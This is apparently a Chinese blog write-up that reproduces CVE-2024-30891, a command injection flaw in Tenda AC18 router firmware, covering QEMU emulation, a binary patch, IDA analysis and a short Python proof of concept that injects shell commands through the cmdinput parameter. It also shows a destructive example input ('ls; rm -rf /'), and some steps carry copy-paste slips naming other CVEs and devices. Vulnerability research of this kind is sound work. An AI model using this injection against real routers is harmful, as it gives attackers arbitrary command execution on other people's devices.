【工业安全】-CVE-2024-30891- Tenda AC18路由器 命令注入漏洞

1.漏洞描述

2.漏洞复现

2.1 qemu-user 模拟:

2.2 qemu-system模拟:

3.漏洞分析

4.poc代码:


1.漏洞描述

漏洞编号:CVE-2024-30891

漏洞名称:Tenda AC18 命令注入

威胁等级:高危

漏洞详情:Tenda AC 18 v15.03.05.05的/goform/exeCommand中存在命令注入漏洞,攻击者可利用该漏洞构造命令输入参数以执行任意命令。

影响范围:v15.03.05.05


2.漏洞复现

在/home/CVE-2024-30891目录下,用qemu-usr用户模式模拟,把固件模拟运行起来。

2.1 qemu-user 模拟:

1.首先在CVE-2022-35555.py同级目录下,binwalk -eM 解压文件。

2.然后对binwalk解包后的固件中的任何二进制文件执行 file 命令,查看下设备的cpu 架构。

命令:file ./bin/httpd

可知Tenda AC18路由器的httpd是基于ARM架构的 32 位小端序可执行文件。

3.给httpd文件可执行权限,命令:chmod +x httpd

4.复制squashfs-root目录下的webroot_ro文件到webroot中

复制代码
rm -rf webroot 
ln -s webroot_ro/ webroot

5.执行模拟命令,sudo qemu-mipsel-static -L . ./bin/httpd

但是卡在这里了,在IDA里面看一下httpd,搜索 welcome,定向分析可知Loc_2E2FC会对 check_network 函数的返回值进行判断,只有网络检查通过才会跳转到右侧loc_2E320继续执行,否则会被卡住。

修改图中MOV R3,R0为MOV R3,#1 。

具体修改时,先在 https://disasm.pro/ 上查一下汇编对应的十六进制:

6.将path 后的httpd 替换原来的文件。

重新给httpd文件可执行权限,进入squashfs-root目录,打开终端。

执行命令: sudo qemu-arm-static -L . ./bin/httpd

失败,所以Tenda AX1803也不支持在本机上开启80端口模拟路由器。

因此要建立一个虚拟网桥br0,配置一下网络:

复制代码
sudo apt install uml-utilities bridge-utils
sudo brctl addbr br0 
sudo brctl addif br0 ens33
sudo ifconfig br0 up 
sudo dhclient br0

重新模拟:sudo qemu-arm-static -L . ./bin/httpd

此时能够访问web界面了:

但是执行poc时出现:

所以不能使用qumu-user模拟路由器,要qemu-system模拟的debian-armhf系统模拟。所以不能使用qumu-user模拟路由器,要qemu-system模拟的debian-armhf系统模拟。

2.2 qemu-system模拟:

已知Tenda AC18路由器的httpd是基于ARM架构的 32 位小端序可执行文件。

1.创建diban目录,下载模拟qemu-system需要的阉割debian(debian-armhf)系统:

复制代码
https://people.debian.org/~aurel32/qemu/armhf/debian_wheezy_armhf_standard.qcow2

https://people.debian.org/~aurel32/qemu/armhf/initrd.img-3.2.0-4-vexpress 

https://people.debian.org/~aurel32/qemu/armhf/vmlinuz-3.2.0-4-vexpres

#进行qemu-system模拟,进入debian-armhf系统:

$sudo qemu-system-arm \

-M vexpress-a9 \

-kernel vmlinuz-3.2.0-4-vexpress \

-initrd initrd.img-3.2.0-4-vexpress \

-drive if=sd,file=debian_wheezy_armhf_standard.qcow2 \

-append "root=/dev/mmcblk0p2 console=ttyAMA0" \

-net nic \

-net tap,ifname=br0,script=no,downscript=no \

debian-armhf login: 账号密码都是root

2.使用 qemu-system系统模拟debian-armhf时,需要建立一个虚拟网桥,使得debian-armhf与我们的宿主机ubuntu16.04能正常通信:

#配置宿主机ubuntu 16.04的ip:

sudo tunctl -t tap0

sudo ifconfig tap0 192.168.2.1/24

#配置虚拟机qemu system模拟的debian-armhf系统的ip:

ifconfig eth0 192.168.2.2/24

3.将宿主机ubuntu 16.04的固件打包上传到debian-armhf虚拟机中

在宿主机ubuntu 16.04上:

打包home/ml/CVE-2020-10987目录下的squashfs-root文件到root根目录

tar -czvf squashfs-root.tar.gz squashfs-root

sudo mv squashfs-root.tar.gz /root/

在虚拟机qemu-system模拟的debian-armhf系统上:

将位于ubuntu16.04的根目录的squashfs-root.tar.gz 文件复制到qemu-system模拟的debian-armhf系统上,并解压。

scp [email protected]:/root/squashfs-root.tar.gz /root/squashfs-root.tar.gz

解压/root/squashfs-root.tar.gz 文件

tar xzf squashfs-root.tar.gz

rm squashfs-root.tar.gz

4.挂载文件系统

$mount -o bind /dev ./squashfs-root/dev

$mount -t proc /proc ./squashfs-root/proc

5.桥接br0

chroot squashfs-root/ sh

brctl addbr br0

ifconfig br0 192.168.2.2/24 up

6.模拟固件

chroot squashfs-root/ bin/httpd

浏览器访问:192.168.2.2

执行poc后可在临时文件中得到hack文件:

python a.py

3.漏洞分析

使用 binwalk -eM 解包固件,获得系统文件以备后续分析。

/goform/exeCommand 请求会触发漏洞,具体漏洞代码存在于<解压后的固件>/squashfs-root/bin/httpd 文件中,exeCommand函数里:

Ida查找exeCommand 函数:

与CVE-2022-3555的漏洞点相同,甚至更直白(cmdinput 参数取到的值没有经过任何检查就传到传递给 doSystemCmd )

可以通过构造恶意输入来注入额外的命令:

src = "ls; rm -rf /";

故我们可以构造

http://<ip router>/goform/exeCommand+"cmdinput=asd;ls -la . > 注入命令来复现此漏洞。

4.poc代码:

代码复现时环境ip为 192.168.2.2

复制代码
import requests
IP = '192.168.2.2:80'
url = f"http://{IP}/goform/exeCommand"
data = "cmdinput=asd;ls -la . > ./tmp/hack;"
ret = requests.post(url=url,data=data)

参考文章:IoT-vuln/Tenda/AC18/formexeCommand.md at main · Lantern-r/IoT-vuln · GitHub

相关推荐
低头不见33 分钟前
tcp的粘包拆包问题,如何解决?
网络·网络协议·tcp/ip
SKYDROID云卓小助手2 小时前
三轴云台之相机技术篇
运维·服务器·网络·数码相机·音视频
ALe要立志成为web糕手4 小时前
SESSION_UPLOAD_PROGRESS 的利用
python·web安全·网络安全·ctf
yuzhangfeng4 小时前
【云计算物理网络】从传统网络到SDN:云计算的网络演进之路
网络·云计算
TDengine (老段)5 小时前
TDengine 中的关联查询
大数据·javascript·网络·物联网·时序数据库·tdengine·iotdb
zhu12893035565 小时前
网络安全的现状与防护措施
网络·安全·web安全
zhu12893035567 小时前
网络安全与防护策略
网络·安全·web安全
沫夕残雪7 小时前
HTTP,请求响应报头,以及抓包工具的讨论
网络·vscode·网络协议·http
π2707 小时前
爬虫:网络请求(通信)步骤,http和https协议
网络·爬虫
virelin_Y.lin8 小时前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全